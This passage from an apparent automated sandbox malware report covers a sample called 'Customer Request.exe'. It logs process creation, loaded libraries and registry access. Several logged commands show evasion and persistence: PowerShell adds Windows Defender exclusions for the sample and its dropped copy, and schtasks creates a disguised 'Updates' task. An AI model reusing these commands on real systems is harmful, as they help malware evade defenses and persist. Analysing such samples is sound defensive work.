VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Customer Request.exe | Virustotal: Detection: 40%
Source: Customer Request.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\Customer Request.exe | File read: C:\Users\user\Desktop\Customer Request.exe
Source: unknown | Process created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"
Source: C:\Users\user\Desktop\Customer Request.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Customer Request.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Customer Request.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Customer Request.exe | Process created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"
Source: C:\Users\user\Desktop\Customer Request.exe | Process created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\gCFuOglEso.exe C:\Users\user\AppData\Roaming\gCFuOglEso.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess created: C:\Users\user\AppData\Roaming\gCFuOglEso.exe "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess created: C:\Users\user\Desktop\Customer Request.exe "C:\Users\user\Desktop\Customer Request.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp"
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess created: C:\Users\user\AppData\Roaming\gCFuOglEso.exe "C:\Users\user\AppData\Roaming\gCFuOglEso.exe"
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Section loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\Customer Request.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Customer Request.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\Customer Request.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Customer Request.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Customer Request.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Customer Request.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: rqSA.pdbSHA256 source: Customer Request.exe, gCFuOglEso.exe.0.dr
                  Source: Binary string: rqSA.pdb source: Customer Request.exe, gCFuOglEso.exe.0.dr

                  Data Obfuscation

                  Source: Customer Request.exe, gCFuOglEso.exe.0.dr, Form4.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
